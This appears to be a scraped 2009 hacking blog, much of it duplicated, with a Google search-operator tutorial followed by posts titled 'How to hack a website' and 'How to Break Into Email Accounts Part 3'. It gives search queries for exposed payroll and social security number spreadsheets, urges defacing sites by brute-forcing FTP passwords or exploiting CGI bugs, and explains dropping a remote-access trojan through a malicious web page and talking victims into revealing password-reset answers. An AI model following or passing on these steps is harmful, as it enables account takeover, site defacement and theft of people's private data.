Basic Operators:
+, -, ~,., *, "", |,
OR
Advanced Operators:
allintext:, allintitle:, allinurl:, bphonebook:, cache:, define:, filetype:, info:, intext:, intitle:, inurl:, link:, phonebook:, related:, rphonebook:, site:, numrange:, daterange
Basic Operators !!
(+) force inclusion of something common
Google ignores common words (where, how, digit, single letters) by default:
Example: StarStar Wars Episode +I
(-) exclude a search term
Example: apple -red
(") use quotes around a search term to search exact phrases:
Example: "Robert Masse"
Robert masse without "" has the 309 ,000 results, but "robert masse" only has 927 results. Reduce the 99% irrelevant results
Basic Operators
(~) search synonym:
Example: ~food
Return the results about food as well as recipe, nutrition and cooking information
(. ) a single-character wildcard:
Example: m.trix
Return the results of M@trix, matrix, metrix.......
( * ) any word wildcard
Advanced Operators: "Site:"
Site: Domain_name
Find Web pages only on the specified domain. If we search a specific site, usually we get the Web structure of the domain
Examples:
site: http://shaswat.bravehost .com
Advanced Operators: "Filetype:"
Filetype: extension_type
Find documents with specified extensions
The supported extensions are:
- HyperText Markup Language (html) - Microsoft PowerPoint (ppt)
- Adobe Portable Document Format (pdf) - Microsoft Word (doc)
- Adobe PostScript (ps) - Microsoft Works (wks, wps, wdb)
- Lotus 1-2-3 - Microsoft Excel (xls)
(wk1 , wk2 , wk3 , wk4 , wk5, wki, wks, wku) - Microsoft Write (wri)
- Lotus WordPro (lwp) - Rich Text Format (rtf)
- MacWrite (mw) - Shockwave Flash (swf)
- Text (ans, txt)
Note: We actually can search asp, php and cgi, pl files as long as it is text- compatible.
Example: Budget filetype: xls
Advanced Operators "Intitle:"
Intitle: search_term
Find search term within the title of a Webpage
Allintitle: search_term1 search_term2 search_term3
Find multiple search terms in the Web pages with the title that includes all these words
These operators are specifically useful to find the directory lists
Example:
Find directory list:
Intitle: Index.of "parent directory"
Advanced Operators "Inurl:"
Inurl: search_term
Find search term in a Web address
Allinurl: search_term1 search_term2 search_term3
Find multiple search terms in a Web address
Examples:
Inurl: cgi-bin
Allinurl: cgi-bin password
Advanced Operators "Intext;"
Intext: search_term
Find search term in the text body of a document.
Allintext: search_term1 search_term2 search_term3
Find multiple search terms in the text body of a document.
Examples:
Intext: Administrator login
Allintext: Administrator login
Advanced Operators: "Cache:"
Cache: URL
Find the old version of Website in Google cache
Sometimes, even the site has already been updated, the old information might be found in cache
Examples:
Cache: http://shaswat.bravehost .com
Advanced Operators
..
Conduct a number range search by specifying two numbers, separated by two periods, with no spaces. Be sure to specify a unit of measure or some other indicator of what the number range represents
Examples:
Computer $ 500..1000
DVD player $ 250..350
Advanced Operators: "Daterange:"
Daterange:-
Find the Web pages between start date and end date
Note: start_date and end date use the Julian date
The Julian date is calculated by the number of days since January 1 , 4713 BC. For example, the Julian date for August 1 , 2001 is 2452122
Examples:
2004.07.10 = 2453196
2004.08.10 = 2453258
Vulnerabilities date range: 2453196-2453258
Advanced Operators "Link:"
Link: URL
Find the Web pages having a link to the specified URL
Related: URL
Find the Web pages that are "similar" to the specified Web page
info: URL
Present some information that Google has about that Web page
Define: search_term
Provide a definition of the words gathered from various online sources
Examples:
Link: shaswat.bravehost.com
Related: shaswat.bravehost.com
Info: shaswat.bravehost.com
Define: Network security
Advanced Operators "phonebook:"
Phonebook
Search the entire Google phonebook
rphonebook
Search residential listings only
bphonebook
Search business listings only
Examples:
Phonebook: robert las vegas (robert in Las Vegas)
Phonebook: ( 702) 944-2001 (reverse search, not always work)
The phonebook is quite limited to U.S.A
But the Question rises What can Google can do for an Ethical Hacker?
Search sensitive information like payroll, SIN, even the personal email box
Vulnerabilities scanner
Transparent proxy
So how but if i tell u a different way to search
k lets do this type in the following statements n c d results
we can only provide u the guidelines, now u need to implement your Creativity to Keep it rolling.
http://shaswat.bravehost .com
Salary
Salary filetype: xls site: edu
Security social insurance number
Intitle: Payroll intext: ssn filetype: xls site: edu
Security Social Insurance Number
Payroll
Google Operators:
Operators are used to refine the results and to maximize the search value. They are your tools as well as ethical hackers' weapons
Basic Operators:
+, -, ~,., *, "", |,
OR
Advanced Operators:
allintext:, allintitle:, allinurl:, bphonebook:, cache:, define:, filetype:, info:, intext:, intitle:, inurl:, link:, phonebook:, related:, rphonebook:, site:, numrange:, daterange
Basic Operators !!
(+) force inclusion of something common
Google ignores common words (where, how, digit, single letters) by default:
Example: StarStar Wars Episode +I
(-) exclude a search term
Example: apple -red
(") use quotes around a search term to search exact phrases:
Example: "Robert Masse"
Robert masse without "" has the 309 ,000 results, but "robert masse" only has 927 results. Reduce the 99% irrelevant results
Basic Operators
(~) search synonym:
Example: ~food
Return the results about food as well as recipe, nutrition and cooking information
(. ) a single-character wildcard:
Example: m.trix
Return the results of M@trix, matrix, metrix.......
( * ) any word wildcard
Advanced Operators: "Site:"
Site: Domain_name
Find Web pages only on the specified domain. If we search a specific site, usually we get the Web structure of the domain
Examples:
site: http://shaswat.bravehost .com
Advanced Operators: "Filetype:"
Filetype: extension_type
Find documents with specified extensions
The supported extensions are:
- HyperText Markup Language (html) - Microsoft PowerPoint (ppt)
- Adobe Portable Document Format (pdf) - Microsoft Word (doc)
- Adobe PostScript (ps) - Microsoft Works (wks, wps, wdb)
- Lotus 1-2-3 - Microsoft Excel (xls)
(wk1 , wk2 , wk3 , wk4 , wk5, wki, wks, wku) - Microsoft Write (wri)
- Lotus WordPro (lwp) - Rich Text Format (rtf)
- MacWrite (mw) - Shockwave Flash (swf)
- Text (ans, txt)
Note: We actually can search asp, php and cgi, pl files as long as it is text- compatible.
Example: Budget filetype: xls
Advanced Operators "Intitle:"
Intitle: search_term
Find search term within the title of a Webpage
Allintitle: search_term1 search_term2 search_term3
Find multiple search terms in the Web pages with the title that includes all these words
These operators are specifically useful to find the directory lists
Example:
Find directory list:
Intitle: Index.of "parent directory"
Advanced Operators "Inurl:"
Inurl: search_term
Find search term in a Web address
Allinurl: search_term1 search_term2 search_term3
Find multiple search terms in a Web address
Examples:
Inurl: cgi-bin
Allinurl: cgi-bin password
Advanced Operators "Intext;"
Intext: search_term
Find search term in the text body of a document.
Allintext: search_term1 search_term2 search_term3
Find multiple search terms in the text body of a document.
Examples:
Intext: Administrator login
Allintext: Administrator login
Advanced Operators: "Cache:"
Cache: URL
Find the old version of Website in Google cache
Sometimes, even the site has already been updated, the old information might be found in cache
Examples:
Cache: http://shaswat.bravehost .com
Advanced Operators
Conduct a number range search by specifying two numbers, separated by two periods, with no spaces. Be sure to specify a unit of measure or some other indicator of what the number range represents
Examples:
Computer $ 500..1000
DVD player $ 250..350
Advanced Operators: "Daterange:"
Daterange:
Find the Web pages between start date and end date
Note: start_date and end date use the Julian date
The Julian date is calculated by the number of days since January 1 , 4713 BC. For example, the Julian date for August 1 , 2001 is 2452122
Examples:
2004.07.10 = 2453196
2004.08.10 = 2453258
Vulnerabilities date range: 2453196-2453258
Advanced Operators "Link:"
Link: URL
Find the Web pages having a link to the specified URL
Related: URL
Find the Web pages that are "similar" to the specified Web page
info: URL
Present some information that Google has about that Web page
Define: search_term
Provide a definition of the words gathered from various online sources
Examples:
Link: shaswat.bravehost.com
Related: shaswat.bravehost.com
Info: shaswat.bravehost.com
Define: Network security
Advanced Operators "phonebook:"
Phonebook
Search the entire Google phonebook
rphonebook
Search residential listings only
bphonebook
Search business listings only
Examples:
Phonebook: robert las vegas (robert in Las Vegas)
Phonebook: ( 702) 944-2001 (reverse search, not always work)
The phonebook is quite limited to U.S.A
But the Question rises What can Google can do for an Ethical Hacker?
Search sensitive information like payroll, SIN, even the personal email box
Vulnerabilities scanner
Transparent proxy
So how but if i tell u a different way to search
k lets do this type in the following statements n c d results
we can only provide u the guidelines, now u need to implement your Creativity to Keep it rolling.
http://shaswat.bravehost .com
Salary
Salary filetype: xls site: edu
Security social insurance number
Intitle: Payroll intext: ssn filetype: xls site: edu
Security Social Insurance Number
Payroll
Monday, July 27, 2009
How to hack a website
Hacking a website or its member section
First of all,why you want to hack a webpage?Is it a certain webpage or any site at all? There are many reasons to hack a website, or a webmaster.Maybe you want to take a revenge or maybe you want to have fun or just learn how to do it ! You can deface the website which means replace the original index with a new one or you can gain access to the member area of the site which might be easier.
Defacing
You can deface the site through telnet or your browser by running remote commands on an old or misconfigured server, the hard thing to do is find an old server, maybe a network of a school or university would do,get a CGI BUG searcher.This program will scan ranges of IPs for web- servers and will scan them for known bugs in their cgis or other bugs and holes.You can learn how to exploite a certain hole by adding in yahoo the name of the bug/hole and the word exploit,search for " cmd.exe exploit".There are more than 700 holes that many servers might have! You can also deface a website by finding the ftp password and just browse through the sites ftp and replace the index.htm.You do that with the : Brute force
To do that you need a brute forcer or brute force attacker and some word lists,the brute forcer sends multiple user/pass requests of words that picks up from namelists and tries to hack the account untill it does! So lets say imagine a porn site that asks for a password, you go there you copy their address, you add the address in a program called brute forcer and then from the brute forcer you choose a text file with names to be used as usernames and a text with names to be used as passwords,the brute forcer will try untill it finds a correct user/pass This should be easier for the newbies than exploiting cgi bugs, many of the newbies havent even heard of it i hope i didnt confuse you with this tutorial there might be more tuts about web hacking and cgi bugs and such.Till then try to find the way to cgi bugs yourself with the cgi scanners in the Web Hacks section or download a brute forcer to crack accounts.
First of all,why you want to hack a webpage?Is it a certain webpage or any site at all? There are many reasons to hack a website, or a webmaster.Maybe you want to take a revenge or maybe you want to have fun or just learn how to do it ! You can deface the website which means replace the original index with a new one or you can gain access to the member area of the site which might be easier.
Defacing
You can deface the site through telnet or your browser by running remote commands on an old or misconfigured server, the hard thing to do is find an old server, maybe a network of a school or university would do,get a CGI BUG searcher.This program will scan ranges of IPs for web- servers and will scan them for known bugs in their cgis or other bugs and holes.You can learn how to exploite a certain hole by adding in yahoo the name of the bug/hole and the word exploit,search for " cmd.exe exploit".There are more than 700 holes that many servers might have! You can also deface a website by finding the ftp password and just browse through the sites ftp and replace the index.htm.You do that with the : Brute force
To do that you need a brute forcer or brute force attacker and some word lists,the brute forcer sends multiple user/pass requests of words that picks up from namelists and tries to hack the account untill it does! So lets say imagine a porn site that asks for a password, you go there you copy their address, you add the address in a program called brute forcer and then from the brute forcer you choose a text file with names to be used as usernames and a text with names to be used as passwords,the brute forcer will try untill it finds a correct user/pass This should be easier for the newbies than exploiting cgi bugs, many of the newbies havent even heard of it i hope i didnt confuse you with this tutorial there might be more tuts about web hacking and cgi bugs and such.Till then try to find the way to cgi bugs yourself with the cgi scanners in the Web Hacks section or download a brute forcer to crack accounts.
Sunday, July 26, 2009
How to Break Into Email Accounts Part 3
he/she logs on to his/her account.
Don't think you can get him/her to accept a file from you? Can you at least get him/her to access a certain web page? Then maybe this next technique is something you should look into.
Currently Internet Explorer is quite vulnerable to an exploit that allows you to drop and execute.exe files via malicious scripting within an html document. For this what you will want to do is set up a web page, make sure to actually put something within this page so that the visitor doesn't get too entirely suspicious, and then imbed the below script into your web page so that the server portion of the RAT of your choice is dropped and executed onto the victim's computer...
While you are at it, you will also want to set up an ip logger on the web page so that you can grab the ip address of the user so that you can connect to the newly established server. Here is the source for a php ip logger you can use on your page...
http://www.planet-source- code.com/vb/scripts/Sho wCode.asp?txtCodeId=539 &lngWId=8
Just insert this source into your page along with the exedrop script, and you are set. Just convince the user to go to this page, and wait till the next time they type in their email password. However, what do you do if you can not contact this user in any way to do any of the above tricks. Well, then you definately have your work cut out for you. It doesn't make the task impossible, but it makes it pretty damn close to it. For this we will want to try info cracking. Info cracking is the process of trying to gather enough information on the user to go through the "Forgot my Password" page, to gain access into the email account.
If you happen to know the user personally, then it helps out a lot. You would then be able to get through the birthday/ zipcode questions with ease, and with a little mental backtracking, or social engineering (talking) out the information from the user be able to get past the secret question. However, what do you do if you do not have this luxury? Well in this case you will have to do a little detective work to fish out the information you need.
First off, if a profile is available for the user, look at the profile to see if you can get any information from the profile. Many times users will put information into their profile, that may help you with cracking the account through the "Forgot my Password" page (where they live, their age, their birthday if you are lucky). If no information is provided then what you will want to do is get on an account that the user does not know about, and try to strike conversation with the user. Just talk to him/her for a little while, and inconspicuously get this information out of the user (inconspicuously as in don't act like you are trying to put together a census, just make casual talk with the user and every once in a while ask questions like "When is your birthday?" and "Where do you live?", and then respond with simple, casual answers).
Once you have enough information to get past the first page, fill those parts out, and go to the next page to find out what the secret question is. Once you have the secret question, you will want to keep making casual conversation with the user and SLOWLY build up to asking a question that would help you answer the secret question. Don't try to get all the information you need in one night or you will look suspicious. Patience is a virtue when info cracking. Just slowly build up to this question. For example, if the secret question is something like "What is my dog's name?", then you would keep talking with the user, and eventually ask him/her "So how many dogs do you have?...Oh, that's nice. What are their names?". The user will most likely not even remember anything about his/her secret question, so will most likely not find such a question suspicious at all (as long as you keep it inconspicuous). So there you go, with a few choice words and a little given time, you have just gotten the user to tell you everything you need to know to break into his/her email account. The problem with this method is that once you go through the "Forgot my Password" page, the password will be changed, and the new password will be given to you. This will of course deny the original user access to his/her own account. But the point of this task is to get YOU access, so it really shouldn't matter. Anyways, that concludes it for this tutorial. Good luck...
Don't think you can get him/her to accept a file from you? Can you at least get him/her to access a certain web page? Then maybe this next technique is something you should look into.
Currently Internet Explorer is quite vulnerable to an exploit that allows you to drop and execute.exe files via malicious scripting within an html document. For this what you will want to do is set up a web page, make sure to actually put something within this page so that the visitor doesn't get too entirely suspicious, and then imbed the below script into your web page so that the server portion of the RAT of your choice is dropped and executed onto the victim's computer...
While you are at it, you will also want to set up an ip logger on the web page so that you can grab the ip address of the user so that you can connect to the newly established server. Here is the source for a php ip logger you can use on your page...
http://www.planet-source- code.com/vb/scripts/Sho wCode.asp?txtCodeId=539 &lngWId=8
Just insert this source into your page along with the exedrop script, and you are set. Just convince the user to go to this page, and wait till the next time they type in their email password. However, what do you do if you can not contact this user in any way to do any of the above tricks. Well, then you definately have your work cut out for you. It doesn't make the task impossible, but it makes it pretty damn close to it. For this we will want to try info cracking. Info cracking is the process of trying to gather enough information on the user to go through the "Forgot my Password" page, to gain access into the email account.
If you happen to know the user personally, then it helps out a lot. You would then be able to get through the birthday/ zipcode questions with ease, and with a little mental backtracking, or social engineering (talking) out the information from the user be able to get past the secret question. However, what do you do if you do not have this luxury? Well in this case you will have to do a little detective work to fish out the information you need.
First off, if a profile is available for the user, look at the profile to see if you can get any information from the profile. Many times users will put information into their profile, that may help you with cracking the account through the "Forgot my Password" page (where they live, their age, their birthday if you are lucky). If no information is provided then what you will want to do is get on an account that the user does not know about, and try to strike conversation with the user. Just talk to him/her for a little while, and inconspicuously get this information out of the user (inconspicuously as in don't act like you are trying to put together a census, just make casual talk with the user and every once in a while ask questions like "When is your birthday?" and "Where do you live?", and then respond with simple, casual answers).
Once you have enough information to get past the first page, fill those parts out, and go to the next page to find out what the secret question is. Once you have the secret question, you will want to keep making casual conversation with the user and SLOWLY build up to asking a question that would help you answer the secret question. Don't try to get all the information you need in one night or you will look suspicious. Patience is a virtue when info cracking. Just slowly build up to this question. For example, if the secret question is something like "What is my dog's name?", then you would keep talking with the user, and eventually ask him/her "So how many dogs do you have?...Oh, that's nice. What are their names?". The user will most likely not even remember anything about his/her secret question, so will most likely not find such a question suspicious at all (as long as you keep it inconspicuous). So there you go, with a few choice words and a little given time, you have just gotten the user to tell you everything you need to know to break into his/her email account. The problem with this method is that once you go through the "Forgot my Password" page, the password will be changed, and the new password will be given to you. This will of course deny the original user access to his/her own account. But the point of this task is to get YOU access, so it really shouldn't matter. Anyways, that concludes it for this tutorial. Good luck...
Subscribe to:
Posts (Atom)
MY STATS
